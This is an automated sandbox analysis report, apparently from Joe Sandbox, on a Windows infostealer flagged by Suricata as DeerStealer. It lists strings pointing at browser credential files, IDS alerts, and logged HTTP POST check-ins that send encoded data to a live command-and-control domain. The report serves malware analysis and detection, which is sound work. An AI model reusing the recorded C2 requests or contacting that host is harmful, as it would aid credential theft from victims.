Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State^;:}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ]C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini^ source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbt\| source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbaK source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\al\Temp source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: dC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\al State source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ticsnp3} source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State>pC}d source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: YC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb981804 source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ]\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,		0_2_0040301A
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,		0_2_00402B79

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.8:49711 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.8:49723 -> 172.67.153.243:443

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49723 -> 172.67.153.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.153.243:443

Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Content-Length: 96Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 53Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 208Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 681886Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 745Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 212Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 380Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 35Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 75155Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1EContent-Length: 35Host: digoperonodice3.online
Source: global traffic	HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Content-Length: 96Host: digoperonodice3.online

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: digoperonodice3.online

Source: unknown

HTTP traffic detected: POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Content-Length: 96Host: digoperonodice3.online

Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
